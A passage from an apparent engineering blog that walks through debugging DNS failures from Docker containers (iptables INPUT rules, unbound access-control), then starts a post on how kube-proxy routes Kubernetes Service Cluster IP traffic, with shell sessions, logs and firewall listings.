    'auth', 'activate-service-account', '--key-file', json_path])
  File "/usr/lib/python3.6/subprocess.py", line 311, in check_call
    raise CalledProcessError(retcode, cmd)
subprocess.CalledProcessError: Command '['gcloud', 'auth', 'activate-service-account', '--key-file', '/etc/_foo/gcp-sa-key.json']' returned non-zero exit status 1.
ERROR:foo: non-zero exit code (1) from `/usr/bin/docker run -it -v /home/dxia/my-project/_foo:/etc/_foo:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python2.7/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.6/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.7/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.8/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.9/dist-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python2.7/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.6/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.7/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.8/site-packages/oauth2client/__init__.py:ro -v /home/dxia/my-project/_foo/__init__.py:/usr/local/lib/python3.9/site-packages/oauth2client/__init__.py:ro --net foo-network -e FOO_COMPONENT_ID=my-project -e FOO_WORKFLOW_ID=DumpKubernetesContainerImagesJob -e FOO_PARAMETER=2021-04-02 -e FOO_DOCKER_IMAGE=my-project:20210422T065801-2b5452d -e 'FOO_DOCKER_ARGS=wrap-luigi --module luigi_tasks DumpKubernetesContainerImagesJob --when 2021-04-02' -e FOO_EXECUTION_ID=foorun-3feaee45-35e4-4c01-9430-86de52eb2db1 -e FOO_TRIGGER_ID=foo-f721de7f-edf9-4bb3-8cdf-1e9bbcec5035 -e FOO_TRIGGER_TYPE=foo -e FOO_ENVIRONMENT=foo -e FOO_LOGGING=text -e GOOGLE_APPLICATION_CREDENTIALS=/etc/_foo/gcp-sa-key.json -e FOO_SERVICE_ACCOUNT=dump-k8-deployment-info-pipeli@my-project.iam.gserviceaccount.com gcr.io/xpn-1/my-project:20210422T065801-2b5452d wrap-luigi --module luigi_tasks DumpKubernetesContainerImagesJob --when 2021-04-02`

The only background knowledge we need to know here is that the qux container is sending a Google Service Account (GSA) JSON credential with "token_uri": "http://172.20.0.127:80/token". Bar then uses that token for further GCP API requests. So bar needs to query DNS for accounts.google.com. Bar container logs show that it cannot lookup the DNS A record for accounts.google.com by querying 127.0.0.11:53.

dxia@my-host:~$ docker ps
CONTAINER ID        IMAGE                                                                    COMMAND                  CREATED             STATUS              PORTS                     NAMES
1b0b2b981f93        nginx:latest                                                             "/docker-entrypoint.…"   9 hours ago         Up 9 hours          0.0.0.0:8080->80/tcp      nginx1
3f9cc17b3f71        foo/bar:latest                                   "./bar"               9 hours ago         Up 9 hours          0.0.0.0:80->80/tcp        bar

dxia@my-host:~$ docker logs --follow bar
2021/04/22 05:54:19 bar started
2021/04/22 06:59:13 Received JWT assertion: [REDACTED base-64 string]
2021/04/22 06:59:13 Servive account name:  projects/-/serviceAccounts/dump-k8-deployment-info-pipeli@my-project.iam.gserviceaccount.com
2021/04/22 06:59:28 Post https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/dump-k8-deployment-info-pipeli@my-project.iam.gserviceaccount.com:generateAccessToken?alt=json&prettyPrint=false: Post https://accounts.google.com/o/oauth2/token: dial tcp: lookup accounts.google.com on 127.0.0.11:53: read udp 127.0.0.1:46920->127.0.0.11:53: i/o timeout
2021/04/22 06:59:28 Failed to create new token for dump-k8-deployment-info-pipeli@my-project.iam.gserviceaccount.com

I wondered why bar was querying 127.0.0.11 for DNS. It turns out this is another loopback address. In fact, all of 127.0.0.0/8 is loopback according to RFC-6890. I guess Docker containers that are attached to user-defined Docker networks are configured by default to use 127.0.0.11 in their /etc/resolv.conf.

dxia@my-host$ docker ps
CONTAINER ID        IMAGE                                                                    COMMAND                  CREATED             STATUS              PORTS                     NAMES
1b0b2b981f93        nginx:latest                                                             "/docker-entrypoint.…"   9 hours ago         Up 9 hours          0.0.0.0:8080->80/tcp      nginx1
3f9cc17b3f71        foo/bar:latest                                   "./bar"               9 hours ago         Up 9 hours          0.0.0.0:80->80/tcp        bar

dxia@my-host$ docker exec -it nginx1 /bin/sh -c "cat /etc/resolv.conf"

search corp.net
nameserver 127.0.0.11
options attempts:1 timeout:5 ndots:0

Why were these Docker containers configured to query for DNS records on 127.0.0.11? It turned out after some Googling that

By default, a container inherits the DNS settings of the host, as defined in the /etc/resolv.conf configuration file. Containers that use the default bridge network get a copy of this file, whereas containers that use a custom network use Docker’s embedded DNS server, which forwards external DNS lookups to the DNS servers configured on the host.

— https://docs.docker.com/config/containers/container-networking/

Now I wondered if Docker’s embedded DNS server is actually running. After some more Googling, I realized that each container also had its own set of firewall rules. So I listed bar’s nat table’s DOCKER_OUTPUT chain’s rules. These two rules showed that the destination port is changed for TCP packets bound for 127.0.0.11:53 to 37619. UDP packets have their port changed to 58552.

dxia@my-host$ sudo nsenter -n -t $(docker inspect --format  bar) sudo iptables --list DOCKER_OUTPUT --verbose --numeric --line-numbers --table nat

Chain DOCKER_OUTPUT (1 references)
 pkts bytes target     prot opt in     out     source               destination
    0     0 DNAT       tcp  --  *      *       0.0.0.0/0            127.0.0.11           tcp dpt:53 to:127.0.0.11:37619
    0     0 DNAT       udp  --  *      *       0.0.0.0/0            127.0.0.11           udp dpt:53 to:127.0.0.11:58552

Whatever’s listening on those ports was accepting TCP and UDP connections.

dxia@my-host$ sudo nsenter -n -t $(docker inspect --format  bar) nc 127.0.0.11 58552 -nvzu -w 5
(UNKNOWN) [127.0.0.11] 58552 (?) open
dxia@my-host$ sudo nsenter -n -t $(docker inspect --format  bar) nc 127.0.0.11 37619 -nvz -w 5
(UNKNOWN) [127.0.0.11] 37619 (?) open

But there was no DNS reply from either.

dxia@my-host$ sudo nsenter -n -t $(docker inspect --format  bar) dig @127.0.0.11 -p 58552 accounts.google.com

; <<>> DiG 9.11.3-1ubuntu1.14-Ubuntu <<>> @127.0.0.11 -p 58552 accounts.google.com
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached

dxia@my-host$ sudo nsenter -n -t $(docker inspect --format  bar) dig @127.0.0.11 -p 37619 accounts.google.com +tcp

; <<>> DiG 9.11.3-1ubuntu1.14-Ubuntu <<>> @127.0.0.11 -p 37619 accounts.google.com +tcp
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached

Docker daemon was listening for DNS queries at that IP and port from within bar.

dxia@my-host$ sudo nsenter -n -p -t $(docker inspect --format  bar) ss -utnlp
Netid        State          Recv-Q         Send-Q                    Local Address:Port                    Peer Address:Port
udp          UNCONN         0              0                            127.0.0.11:58552                        0.0.0.0:*             users:(("dockerd",pid=10984,fd=38))
tcp          LISTEN         0              128                          127.0.0.11:37619                        0.0.0.0:*             users:(("dockerd",pid=10984,fd=40))
tcp          LISTEN         0              128                                   *:80                                 *:*             users:(("bar",pid=12150,fd=3))

After enabling log-level": "debug" in /etc/docker/daemon.json and reloading the configuration file, I saw that the daemon was trying to forward the DNS query to 10.99.0.1. This was the IP of the corp0 bridge network interface which we create instead of the default docker0 bridge network. I saw there was an IO timeout when the daemon was waiting for the DNS reply.

dxia@my-host$ sudo journalctl --follow -u docker
-- Logs begin at Tue 2019-11-05 18:17:27 UTC. --
Apr 22 15:43:12 my-host.corp.net dockerd[10984]: time="2021-04-22T15:43:12.496979903Z" level=debug msg="[resolver] read from DNS server failed, read udp 172.20.0.127:37928->10.99.0.1:53: i/o timeout"
Apr 22 15:43:13 my-host.corp.net dockerd[10984]: time="2021-04-22T15:43:13.496539033Z" level=debug msg="Name To resolve: accounts.google.com."
Apr 22 15:43:13 my-host.corp.net dockerd[10984]: time="2021-04-22T15:43:13.496958664Z" level=debug msg="[resolver] query accounts.google.com. (A) from 172.20.0.127:51642, forwarding to udp:10.99.0.1"

We set dockerd’s upstream DNS server as 10.99.0.1 because we have unbound running as a DNS proxy/cache on the host. We configured it to bind on the bridge interface so Docker containers can hit the host-local unbound instance by routing DNS requests to corp0.

So why can’t the daemon forward IP packets from 172.20.0.127:37928 to 10.99.0.1:53? It seemed like UDP packets sent from bar were able to reach 10.99.0.1:53, but DNS requests failed. I also knew DNS requests from the host to 10.99.0.1:53 worked.

dxia@my-host:~$ sudo nsenter -n -t $(docker inspect --format  bar) nc 10.99.0.1 53 -nvzu -w 5
(UNKNOWN) [10.99.0.1] 53 (domain) open

dxia@my-host:~$ sudo nsenter -n -t $(docker inspect --format  bar) dig @10.99.0.1 accounts.google.com

; <<>> DiG 9.11.3-1ubuntu1.14-Ubuntu <<>> @10.99.0.1 accounts.google.com
; (1 server found)
;; global options: +cmd
;; connection timed out; no servers could be reached

dxia@my-host:~$ dig @10.99.0.1 accounts.google.com

; <<>> DiG 9.11.3-1ubuntu1.14-Ubuntu <<>> @10.99.0.1 accounts.google.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39308
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;accounts.google.com.     IN  A

;; ANSWER SECTION:
accounts.google.com.  108 IN  A   142.250.31.84

;; Query time: 1 msec
;; SERVER: 10.99.0.1#53(10.99.0.1)
;; WHEN: Mon Apr 26 23:58:28 UTC 2021
;; MSG SIZE  rcvd: 64

My hypothesis at this point was that Docker’s embedded DNS server wasn’t working in some way. After exploring this for a while with no luck, I questioned my assumption that UDP packets from 172.20.0.127:37928 were able to reach 10.99.0.1:53. I realized TCP packets from 172.20.0.127:37928 were not able to reach 10.99.0.1:53.

dxia@my-host:~$ sudo nsenter -n -t $(docker inspect --format  bar) nc 10.99.0.1 53 -nvz -w 5
(UNKNOWN) [10.99.0.1] 53 (domain) : Connection timed out

So why were UDP packets able to? Isn’t UDP a fire-and-forget protocol? How can nc even tell if an IP and port is listening for UDP packets at all? It was good that I backtracked and questioned my assumption because it turns out that one cannot distinguish between an open UDP port and dropped packets en route to that port.

So it must be another networking issue which means there must be another firewall rule that’s blocking packets from the bar container to 10.99.0.1. After a while of looking, I realized the filter table’s INPUT chain’s default policy was DROP and that there was no rule that matched packets coming in from the br-8ce7e363e4f9 interface.

dxia@my-host:~$ sudo iptables --list INPUT --verbose --numeric --line-numbers --table filter
Chain INPUT (policy DROP 0 packets, 0 bytes)
num   pkts bytes target     prot opt in     out     source               destination
   434M  345G            all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 00 ACC-eth0 input */
      0     0            all  --  eth1   *       0.0.0.0/0            0.0.0.0/0            /* 00 ACC-eth1 input */
   7080  283K DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 000 drop invalid */ ctstate INVALID
  1907M  568G ipthrouput  all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 000 track forward */
   987M  414G ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 001 accept established */ ctstate RELATED,ESTABLISHED
   763M   95G ACCEPT     all  --  lo     *       0.0.0.0/0            0.0.0.0/0            /* 002 allow local */
      0     0 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 003 accept ipsec */ policy match dir in pol ipsec
      1    28 ACCEPT     icmp --  *      *       0.0.0.0/0            0.0.0.0/0            /* 004 allow icmp */ icmptype 8 limit: avg 10/sec burst 5
      0     0 DROP       icmp --  *      *       0.0.0.0/0            0.0.0.0/0            /* 005 drop icmp */
     0     0 DROP       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            multiport dports 9203 /* 006 block JMX on service net */
     0     0 REJECT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            multiport dports 9203 /* 020 deny direct access to JMX port on helios nodes */ reject-with icmp-port-unreachable
     0     0 DROP       all  --  eth0   *       10.48.64.0/22        0.0.0.0/0            /* 08 drop traffic from osxenv 10.48.64.0/22 */
     0     0 DROP       all  --  eth0   *       10.97.16.0/21        0.0.0.0/0            /* 08 drop traffic from osxenv 10.97.16.0/21 */
     0     0 DROP       all  --  eth0   *       172.24.32.0/22       0.0.0.0/0            /* 08 drop traffic from windowsbuildagentsenv 172.24.32.0/22 */
     0     0 DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 08 prevent access from buildagent machines */ match-set buildagent src
     0     0 DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 08 prevent access from paymentbamboo machines */ match-set paymentbamboo src
 18168 1094K ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 09 allow service nets */ match-set service_nets src
   134  8496 ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 09 allow tech offices */ match-set tech_offices src
     0     0 ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 09 allow testenv */ match-set testenv src
     0     0 ACCEPT     all  --  eth0   *       130.211.0.0/22       0.0.0.0/0            /* 10 Google networks for 130.211.0.0/22 */
     0     0 ACCEPT     all  --  eth0   *       35.191.0.0/16        0.0.0.0/0            /* 10 Google networks for 35.191.0.0/16 */
     0     0 LOG        tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 11 inbound eth0: */ limit: avg 3/min burst 5 LOG flags 0 level 4 prefix "input eth0: "
     0     0 LOG        tcp  --  eth1   *       0.0.0.0/0            0.0.0.0/0            /* 11 inbound eth1: */ limit: avg 3/min burst 5 LOG flags 0 level 4 prefix "input eth1: "
     0     0 ACCEPT     all  --  docker0 *       0.0.0.0/0            0.0.0.0/0            /* 20 allow all docker0 traffic */
  158M   59G ACCEPT     all  --  corp0 *       0.0.0.0/0            0.0.0.0/0            /* 20 allow all corp0 traffic */
     0     0 ACCEPT     tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            multiport dports 22 /* 500 allow ssh on service net */ ctstate NEW recent: SET name: DEFAULT side: source mask: 255.255.255.255
     0     0 DROP       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            multiport dports 22 /* 501 limit ssh on service net */ ctstate NEW recent: UPDATE seconds: 180 hit_count: 20 name: DEFAULT side: source mask: 255.255.255.255

So I added a matching rule that accepted those packets manually.

sudo iptables --table filter --append INPUT --in-interface br-8ce7e363e4f9 --source 0.0.0.0/0 --destination 0.0.0.0/0 --jump ACCEPT

dxia@my-host:~$ sudo iptables --list INPUT --verbose --numeric --line-numbers --table filter
Chain INPUT (policy DROP 0 packets, 0 bytes)
num   pkts bytes target     prot opt in     out     source               destination
   434M  345G            all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 00 ACC-eth0 input */
      0     0            all  --  eth1   *       0.0.0.0/0            0.0.0.0/0            /* 00 ACC-eth1 input */
   7080  283K DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 000 drop invalid */ ctstate INVALID
  1908M  568G ipthrouput  all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 000 track forward */
   987M  414G ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 001 accept established */ ctstate RELATED,ESTABLISHED
   763M   95G ACCEPT     all  --  lo     *       0.0.0.0/0            0.0.0.0/0            /* 002 allow local */
      0     0 ACCEPT     all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 003 accept ipsec */ policy match dir in pol ipsec
      1    28 ACCEPT     icmp --  *      *       0.0.0.0/0            0.0.0.0/0            /* 004 allow icmp */ icmptype 8 limit: avg 10/sec burst 5
      0     0 DROP       icmp --  *      *       0.0.0.0/0            0.0.0.0/0            /* 005 drop icmp */
     0     0 DROP       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            multiport dports 9203 /* 006 block JMX on service net */
     0     0 REJECT     tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            multiport dports 9203 /* 020 deny direct access to JMX port on helios nodes */ reject-with icmp-port-unreachable
     0     0 DROP       all  --  eth0   *       10.48.64.0/22        0.0.0.0/0            /* 08 drop traffic from osxenv 10.48.64.0/22 */
     0     0 DROP       all  --  eth0   *       10.97.16.0/21        0.0.0.0/0            /* 08 drop traffic from osxenv 10.97.16.0/21 */
     0     0 DROP       all  --  eth0   *       172.24.32.0/22       0.0.0.0/0            /* 08 drop traffic from windowsbuildagentsenv 172.24.32.0/22 */
     0     0 DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 08 prevent access from buildagent machines */ match-set buildagent src
     0     0 DROP       all  --  *      *       0.0.0.0/0            0.0.0.0/0            /* 08 prevent access from paymentbamboo machines */ match-set paymentbamboo src
 18168 1094K ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 09 allow service nets */ match-set service_nets src
   134  8496 ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 09 allow tech offices */ match-set tech_offices src
     0     0 ACCEPT     all  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 09 allow testenv */ match-set testenv src
     0     0 ACCEPT     all  --  eth0   *       130.211.0.0/22       0.0.0.0/0            /* 10 Google networks for 130.211.0.0/22 */
     0     0 ACCEPT     all  --  eth0   *       35.191.0.0/16        0.0.0.0/0            /* 10 Google networks for 35.191.0.0/16 */
     0     0 LOG        tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            /* 11 inbound eth0: */ limit: avg 3/min burst 5 LOG flags 0 level 4 prefix "input eth0: "
     0     0 LOG        tcp  --  eth1   *       0.0.0.0/0            0.0.0.0/0            /* 11 inbound eth1: */ limit: avg 3/min burst 5 LOG flags 0 level 4 prefix "input eth1: "
     0     0 ACCEPT     all  --  docker0 *       0.0.0.0/0            0.0.0.0/0            /* 20 allow all docker0 traffic */
  158M   59G ACCEPT     all  --  corp0 *       0.0.0.0/0            0.0.0.0/0            /* 20 allow all corp0 traffic */
     0     0 ACCEPT     tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            multiport dports 22 /* 500 allow ssh on service net */ ctstate NEW recent: SET name: DEFAULT side: source mask: 255.255.255.255
     0     0 DROP       tcp  --  eth0   *       0.0.0.0/0            0.0.0.0/0            multiport dports 22 /* 501 limit ssh on service net */ ctstate NEW recent: UPDATE seconds: 180 hit_count: 20 name: DEFAULT side: source mask: 255.255.255.255
     0     0 ACCEPT     all  --  br-8ce7e363e4f9 *       0.0.0.0/0            0.0.0.0/0

I retried querying for accounts.google.com, and I got a DNS reply!

dxia@my-host:~$ sudo nsenter -n -t $(docker inspect --format  bar) dig @127.0.0.11 accounts.google.com

; <<>> DiG 9.11.3-1ubuntu1.14-Ubuntu <<>> @127.0.0.11 accounts.google.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 9592
;; flags: qr rd ad; QUERY: 0, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; Query time: 0 msec
;; SERVER: 127.0.0.11#53(127.0.0.11)
;; WHEN: Tue Apr 27 00:07:13 UTC 2021
;; MSG SIZE  rcvd: 12

But… there’s no A records? Docker daemon logs stated that the upstream local unbound DNS server did not return any A records.

Error #3: unbound refused to reply to DNS queries from a private IP range used by the Docker network we’re using

Apr 27 00:07:13 my-host.corp.net dockerd[32659]: time="2021-04-27T00:07:13.864160829Z" level=debug msg="Name To resolve: accounts.google.com."
Apr 27 00:07:13 my-host.corp.net dockerd[32659]: time="2021-04-27T00:07:13.864325564Z" level=debug msg="[resolver] query accounts.google.com. (A) from 172.20.0.127:57576, forwarding to udp:10.99.0.1"
Apr 27 00:07:13 my-host.corp.net dockerd[32659]: time="2021-04-27T00:07:13.864537556Z" level=debug msg="[resolver] external DNS udp:10.99.0.1 did not return any A records for \"accounts.google.com.\""

Hm, I noticed the status in the empty DNS reply is REFUSED. I recalled that unbound supports configuring which DNS queries it will reply to based on originating interface and IP.

dxia@my-host:~$ grep access-control /etc/unbound/unbound.conf
    access-control: 127.0.0.1 allow
    access-control: 10.99.0.0/24 allow
    access-control: 10.174.18.90 allow

Bingo! There’s no access-control entry that allowed DNS queries from 172.20.0.127. I added access-control: 172.16.0.0/12 allow (since all of 172.16.0.0/12 is private IPv4 address space according to RFC-1918) and reloaded unbound. Now it worked!

dxia@my-host:~$ sudo systemctl reload unbound
dxia@my-host:~$ sudo nsenter -n -t $(docker inspect --format  bar) dig @127.0.0.11 accounts.google.com

; <<>> DiG 9.11.3-1ubuntu1.14-Ubuntu <<>> @127.0.0.11 accounts.google.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36432
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;accounts.google.com.     IN  A

;; ANSWER SECTION:
accounts.google.com.  143 IN  A   74.125.202.84

;; Query time: 2 msec
;; SERVER: 127.0.0.11#53(127.0.0.11)
;; WHEN: Tue Apr 27 00:11:41 UTC 2021
;; MSG SIZE  rcvd: 64

Docker daemon logs showed the following.

Apr 27 00:11:41 my-host.corp.net dockerd[32659]: time="2021-04-27T00:11:41.957934764Z" level=debug msg="Name To resolve: accounts.google.com."
Apr 27 00:11:41 my-host.corp.net dockerd[32659]: time="2021-04-27T00:11:41.958087666Z" level=debug msg="[resolver] query accounts.google.com. (A) from 172.20.0.127:33346, forwarding to udp:10.99.0.1"
Apr 27 00:11:41 my-host.corp.net dockerd[32659]: time="2021-04-27T00:11:41.960007990Z" level=debug msg="[resolver] received A record \"74.125.202.84\" for \"accounts.google.com.\" from udp:10.99.0.1"

General Debugging Strategies and Techniques I Used

Here are the general debugging strategies I used and reinforced for myself.

When network requests fail, go down one layer on the stack to identify on exactly which layer it fails. I.e. find out which protocol is responsible for the failure: HTTP, TCP, IP?
Try to reproduce the error by running the most direct and minimal command that simulates my actual failure. In this case, an HTTP request made by gcloud was failing. I translated that into an nc command that simulated the establishment of the TCP connection between containers. Or a DNS query from bar was failing. I translated that into a dig command. And in all these cases, the origin of these IP packets mattered. So knowing how to use nsenter to enter a network namespace and create IP packets that originate from the same container was useful. nsenter is essential when debugging containers that don’t have any tools installed in them. The bar image only contains one go-compiled executable. There’s no other tools I can use in there.
I encountered three errors in this case. Tackle one error at a time, and don’t give up.
Be scientific. Have a working hypothesis at each step for which you collect evidence that either supports or refutes it.
If you get stuck, go back and question your previous assumptions or conclusions. Are there other tests you can run that can confirm or disprove what you thought was true?

Patches

Error #1: I created a patch that makes our Puppet installation ignore rules created by Docker networks in the filter table’s FORWARD chain.

Error #2: Unfortunately, I don’t think there’s a good solution to this other than disabling our GCE VM’s periodic Puppet runs and manually adding a rule to allow packets from the new interface. The chain’s default policy is DROP, and interface names are dynamic.

Error #3: I made a patch that makes unbound reply to DNS queries with source IPs of in the range 172.16.0.0/12.

How Kubernetes Routes IP Packets to Services' Cluster IPs

2021-01-27T13:22:02-05:00

I recently observed DNS resolution errors on a large Kubernetes (K8s) cluster. This behavior was only happening on 0.1% of K8s nodes. But the fact that this behavior wasn’t self-healing and crippled tenant workloads in addition to my penchant to chase rabbits down holes meant I wasn’t going to let it go. I emerged learning how K8s Services’ Cluster IP feature actually works. Explaining this feature and my particular problem and speculative fix is the goal of this post.

The Problem

The large K8s cluster is actually a Google Kubernetes Engine (GKE) cluster with master version 1.17.14-gke.400 and node version 1.17.13-gke.2600. This is a multi-tenant cluster with hundreds of nodes. Each node runs dozens of user workloads. Some users said DNS resolution within their Pods on certain nodes weren’t working. I was able to reproduce this behavior with the following steps.

Kubernetes schedules kube-dns Pods and a Service on the cluster that provide DNS and configures kubelets to tell individual containers to use the DNS Service’s IP to resolve DNS names. See K8s docs here. First I get the kube-dns‘ Service’s Cluster IP. This is the IP address to which DNS queries from Pods are sent.

kubectl --context my-gke-cluster -n kube-system get services kube-dns
NAME       TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)         AGE
kube-dns   ClusterIP   10.178.64.10           53/UDP,53/TCP   666d

Then I make DNS queries against the Cluster IP from a Pod running on a broken node.

# Log into the GKE node
gcloud --project my-project compute ssh my-gke-node --zone us-central1-b --internal-ip

# Need to run toolbox container which has iptables command. Google's Container-Optimized OS doesn't
# have it.
dxia@my-gke-node ~ $ toolbox
20200603-00: Pulling from google-containers/toolbox
Digest: sha256:36e2f6b8aa40328453aed7917860a8dee746c101dfde4464ce173ed402c1ec57
Status: Image is up to date for gcr.io/google-containers/toolbox:20200603-00
gcr.io/google-containers/toolbox:20200603-00
e6b1ee70f91ac405623cbf1d2afa9a532a022dc644bddddd754d2cd786f58273

dxia-gcr.io_google-containers_toolbox-20200603-00
Please do not use --share-system anymore, use $SYSTEMD_NSPAWN_SHARE_* instead.
Spawning container dxia-gcr.io_google-containers_toolbox-20200603-00 on /var/lib/toolbox/dxia-gcr.io_google-containers_toolbox-20200603-00.
Press ^] three times within 1s to kill container.

# Install dig
root@toolbox:~# apt-get update && apt-get install dnsutils

# Ask the kube-dns Cluster IP to resolve www.google.com
# dig will hang when it's waiting on a DNS reply. So ^C's show DNS resolution failures
root@toolbox:~# for x in $(seq 1 20); do echo ${x}; dig @10.178.64.10 www.google.com > /dev/null; done
1
^C2
^C3
4
5
6
7
8
^C9
10
11
12
13
14
15
^C16
17
18
^C19
20

I cordoned and drained the node and added the annotation cluster-autoscaler.kubernetes.io/scale-down-disabled=true to prevent the cluster autoscaler from deleting it.

Then I performed a more basic test. I tested whether I could even make a TCP connection to the Cluster IP on port 53 (default DNS port).

# Run nc 1000 times without reverse DNS lookup, in verbose and scan mode
# Count only failed connections
root@toolbox:~# for x in $(seq 1 1000); do nc 10.178.64.10 53 -nvz 2>&1 | grep -v open; done | wc -l
257

A quarter of the TCP connections fail. This means the error is below the DNS layer at TCP layer 3.

Finding the Root Cause: Down the Rabbit Hole

Some background for those unfamiliar. K8s nodes (via the kube-proxy DaemonSet) will route IP packets originating from a Pod with a destination of a K8s Service’s Cluster IP to a backing Pod IP in one of three proxy modes: user space, iptables, and IPVS. I’m assuming GKE runs kube-proxy in iptables proxy mode since iptables instead of IPVS is mentioned in their docs here.

kube-proxy should keep the node’s iptable rules up to date with the actual kube-dns Service’s endpoints. The following console output shows how I figured out the IP packet flow by tracing matching iptables rules.

# List rules in FORWARD chain's filter table
root@toolbox:~# iptables -L FORWARD -t filter
Chain FORWARD (policy DROP)
target     prot opt source               destination
cali-FORWARD  all  --  anywhere             anywhere             /* cali:wUHhoiAYhphO9Mso */
KUBE-FORWARD  all  --  anywhere             anywhere             /* kubernetes forwarding rules */
KUBE-SERVICES  all  --  anywhere             anywhere             ctstate NEW /* kubernetes service portals */
DOCKER-USER  all  --  anywhere             anywhere
DOCKER-ISOLATION-STAGE-1  all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
DOCKER     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     tcp  --  anywhere             anywhere
ACCEPT     udp  --  anywhere             anywhere
ACCEPT     icmp --  anywhere             anywhere
ACCEPT     sctp --  anywhere             anywhere

# List rules in KUBE-SERVICES chain's nat table and look for rules that forward IP packets destined
# for the K8s Service kube-system/kube-dns' Cluster IP
root@toolbox:~# iptables -L KUBE-SERVICES -t nat | grep kube-system/kube-dns | grep SVC
KUBE-SVC-ERIFXISQEP7F7OF4  tcp  --  anywhere             10.178.64.10         /* kube-system/kube-dns:dns-tcp cluster IP */ tcp dpt:domain
KUBE-SVC-TCOU7JCQXEZGVUNU  udp  --  anywhere             10.178.64.10         /* kube-system/kube-dns:dns cluster IP */ udp dpt:domain

# List rules in KUBE-SVC-ERIFXISQEP7F7OF4 chain's nat table
Chain KUBE-SVC-ERIFXISQEP7F7OF4 (1 references)
target     prot opt source               destination
KUBE-SEP-BMNCBK7ROA3MA6UU  all  --  anywhere             anywhere             statistic mode random probability 0.01538461540
KUBE-SEP-GYUBQUCI6VR6AER2  all  --  anywhere             anywhere             statistic mode random probability 0.01562500000
KUBE-SEP-IF56RUVXN2P4ORZZ  all  --  anywhere             anywhere             statistic mode random probability 0.01587301586
KUBE-SEP-WUD7OE7TYMWFJJYX  all  --  anywhere             anywhere             statistic mode random probability 0.01612903224
KUBE-SEP-B7IYZJB6QVUX246S  all  --  anywhere             anywhere             statistic mode random probability 0.01639344264
KUBE-SEP-T6B7SPNOX3DH33BE  all  --  anywhere             anywhere             statistic mode random probability 0.01666666660
KUBE-SEP-REJSUT2VC76HMIRQ  all  --  anywhere             anywhere             statistic mode random probability 0.01694915257
KUBE-SEP-B4N4VXNUSBNXHV73  all  --  anywhere             anywhere             statistic mode random probability 0.01724137925
KUBE-SEP-XUJIW6IGZX4X5BBG  all  --  anywhere             anywhere             statistic mode random probability 0.01754385978
KUBE-SEP-MMBQBWR6AYIPMUZL  all  --  anywhere             anywhere             statistic mode random probability 0.01785714272
KUBE-SEP-6O5U6FAKQVEXGTP7  all  --  anywhere             anywhere             statistic mode random probability 0.01818181807
KUBE-SEP-DMN3RJWMPAEHNOGE  all  --  anywhere             anywhere             statistic mode random probability 0.01851851866
KUBE-SEP-FHJKZIH3JDZSXJUD  all  --  anywhere             anywhere             statistic mode random probability 0.01886792434
